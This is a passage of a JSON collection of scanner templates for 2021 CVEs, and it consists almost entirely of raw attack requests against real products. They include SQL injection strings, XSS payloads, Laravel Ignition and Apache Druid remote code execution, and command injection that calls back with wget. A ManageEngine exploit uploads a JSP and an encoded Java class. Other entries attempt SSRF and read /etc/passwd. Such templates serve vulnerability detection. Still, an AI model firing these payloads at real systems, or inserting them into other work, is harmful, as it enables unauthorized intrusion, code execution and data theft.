</java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication 